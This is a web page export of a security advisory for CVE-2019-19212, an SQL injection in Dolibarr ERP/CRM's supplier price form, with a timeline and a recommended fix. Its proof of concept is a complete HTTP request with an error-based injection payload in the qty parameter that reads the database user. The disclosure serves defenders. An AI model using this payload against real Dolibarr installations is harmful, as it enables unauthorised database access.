{"id":16629,"date":"2021-07-08T11:34:57","date_gmt":"2021-07-08T09:34:57","guid":{"rendered":"https:\/\/herolab-usd.formwandler.rocks\/security-advisories\/usd-2019-0054\/"},"modified":"2021-07-19T14:12:30","modified_gmt":"2021-07-19T12:12:30","slug":"usd-2019-0054","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2019-0054\/","title":{"rendered":"usd-2019-0054"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

usd-2019-0054 | Dolibarr ERP\/CRM ver. 3.0 \u2013 10.0.3<\/span><\/h1>\n

<\/span>
Advisory ID<\/strong>: usd-2019-0054<\/span>
CVE Number<\/strong>: CVE-2019-19212<\/span>
Affected Product<\/strong>: Dolibarr ERP\/CRM<\/span>
Affected Version<\/strong>: 3.0 \u2013 10.0.3<\/span>
Vulnerability Type<\/strong>: SQL injection<\/span>
Security Risk<\/strong>: Critical<\/span>
Vendor URL<\/strong>: https:\/\/www.dolibarr.org\/<\/a><\/span>
Vendor Status<\/strong>: Fixed (not verified)<\/span><\/p>\n

<\/h3>\n

Description<\/h3>\n

It is possible to execute arbitrary SQL commands by manipulating the qty parameter while editing the price of an product, used by \/dolibarr\/htdocs\/product\/fournisseurs.php<\/span><\/p>\n

Proof of Concept (PoC)<\/h3>\n

PoC to read the current database user:<\/span><\/p>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"9e260d37-0be2-4a12-a10e-3ed7e27b6ac6\" hover_enabled=\"0\" sticky_enabled=\"0\"]POST \/dolibarr\/htdocs\/product\/fournisseurs.php?id=1 HTTP\/1.1
\nHost: localhost
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:60.0) Gecko\/20100101 Firefox\/60.0
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8
\nAccept-Language: de-DE
\nAccept-Encoding: gzip, deflate
\nReferer: http:\/\/localhost\/dolibarr\/htdocs\/product\/fournisseurs.php?id=1&amp;action=add_price
\nContent-Type: application\/x-www-form-urlencoded
\nContent-Length: 494
\nCookie: DOLSESSID_d62fd6e735d72194222ef3c6d1021d7a=hltic273b6m378p7a1qrqf1b2d
\nConnection: close
\nUpgrade-Insecure-Requests: 1<\/p>\n

token=%242y%2410%24TZJzw%2F3dPdYxPhcc.H1gF.JSduPMJyndwzgx1Bc7Wsd7XSGmOvgMe&amp;action=updateprice&amp;id_fourn=1&amp;ref_fourn=1234&amp;qty=%28SELECT%209354%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a7a71%2C%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%29%2C1%2C54%29%29%2C0x7170767a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29&amp;tva_tx=0&amp;price=123&amp;price_base_type=HT&amp;remise_percent=&amp;delivery_time_days=&amp;supplier_reputation=-1<\/code><\/pre>\n

[\/et_pb_text][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\"]<\/p>\n

\n
\n

Fix<\/h3>\n

It is recommended to use prepared statements. Building the SQL query by hand is always more prone to errors which lead to vulnerabilities. Furthermore, a blacklist attempt to filter user input is not recommend due to its complexity.<\/span><\/p>\n

<\/h3>\n

Timeline<\/h3>\n
    \n
  • 2019-09-06 Vulnerability discovered by Daniel Hoffmann<\/li>\n
  • 2019-09-11 First contact with vendor<\/li>\n
  • 2019-10-30 Vendor released version 10.0.3 which fixes the vulnerability (not verified)<\/li>\n
  • 2020-02-05 Security advisory released<\/li>\n<\/ul>\n

    Credits<\/h3>\n

    This security vulnerability was discovered by Daniel Hoffmann of usd AG.<\/span><\/p>\n<\/div>\n<\/div>\n

    [\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"

    usd-2019-0054 | Dolibarr ERP\/CRM ver. 3.0 \u2013 10.0.3 Advisory ID: usd-2019-0054CVE Number: CVE-2019-19212Affected Product: Dolibarr ERP\/CRMAffected Version: 3.0 \u2013 10.0.3Vulnerability Type: SQL injectionSecurity Risk: CriticalVendor URL: https:\/\/www.dolibarr.org\/Vendor Status: Fixed (not verified) Description It is possible to execute arbitrary SQL commands by manipulating the qty parameter while editing the price of an product, used by \/dolibarr\/htdocs\/product\/fournisseurs.php […]<\/p>\n","protected":false},"author":96,"featured_media":0,"parent":16124,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","inline_featured_image":false,"footnotes":""},"class_list":["post-16629","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16629","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/users\/96"}],"replies":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/comments?post=16629"}],"version-history":[{"count":0,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16629\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/pages\/16124"}],"wp:attachment":[{"href":"https:\/\/herolab.usd.de\/en\/wp-json\/wp\/v2\/media?parent=16629"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}